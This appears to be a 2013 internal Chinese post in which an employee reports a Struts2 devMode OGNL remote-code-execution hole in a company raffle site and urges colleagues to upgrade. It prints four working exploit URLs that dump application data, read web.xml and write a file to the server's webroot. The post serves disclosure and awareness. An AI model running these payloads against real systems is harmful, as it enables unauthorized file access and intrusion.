无语的年会抽奖.......

首选声明, 做这个完全是想告诉大家安全的重要性, 没有 针对 任何人, 任何事, 请大家务必关注安全领域的信息, 特别是如今的互联网时代, 安全性应该放在第一位.

如果不小心发生用户数据泄漏事件, 会对公司的声誉产生不良影响.

 

就如同我们的操作系统时不时都需要打补丁一样, 每个程序都不是完美的, 有朝一日出一个大bug, 大家应该第一时间做 出反 应, 以免遭遇不必要的损失.

就如下我们目前的状况, 产品中多使用了很多开源的组件, 少则几个, 多则几十个, 他们都有可能出现bug, 你使用 得越 多, "中奖"机率也就越高.

开源绝对是好东西, 我这里当然不是恐吓大家千万不要使用 任何 开源组件, 而是提醒大家务必/一定/确定/及时地关注自己所使用的开源组件的动态, 是否有重大漏洞被爆出, 及时找出应 对方案.

 

下面就是我刚好碰到的, 想必有些同事关注得比较少, 所以大家就全当是学习了, 再次声明,  我没有针对什么, 唯一想做的就是让产品变得更好.

 

---

 

今年的年会抽奖正在火热进行中, 我当然也不想错失机会, 就去上传照片了

出于测试的目的, 我上传照片时选择了一个test.js文件, 于是乎沦陷了

 

这个devMode给我提了个醒, 早一阵子看过一篇安全方面的文章, 有介绍 Top Ten Web Hacking Techniques of 2011

Multiple vulnerabilities in Apache Struts2 and property oriented programming with Java

是的, 2011年的东西, 现在是2013年了, 而且我也是那是才知道的, 实在惭愧...

请大家务必重视这个漏洞, 非常非常可怕的漏洞 -- remote command execution, 主要是OGNL在作怪

在apache struts上面有公布这些漏洞, 建议大家都升级到最新版

http://struts.apache.org/downloads.html

 

 

于是乎, 全当是测试了

1. 基础测试, 查看应用的application, 发现有用的信息

http://test.XXXX.com.cn:9980/twny/userAvatar.action?debug=command&expression=%23application

 

2. 测试读取文件

http://test.XXXX.com.cn:9980/twny/userAvatar.action?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22E:/Tomcat6.0/webapps/twny/WEB-INF/web.xml%22))

 

3. 测试写入文件

http://test.XXXX.com.cn:9980/twny/userAvatar.action?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@writeStringToFile(new%20java.io.File(%22E:/Tomcat6.0/webapps/twny/5265.html%22),%20%22please%20disable%20devMode%22)

 

4. 查看写入结果

http://test.XXXX.com.cn:9980/twny/5265.html

 

 

测试到此为止, 希望相关同事能够立即修复漏洞, 其他使用过struts的同事也可以仔细检查下自己有没有中招, 够升级的尽量升级, 不方便升级的尽量关闭一些危险设置

希望借此机会让大家更多地关心系统的安全.

不经意间, 你小小的一个true or false可能就是一整个产品的true or false!

 

最后非常感谢大家来听我发的牢骚, 谢谢!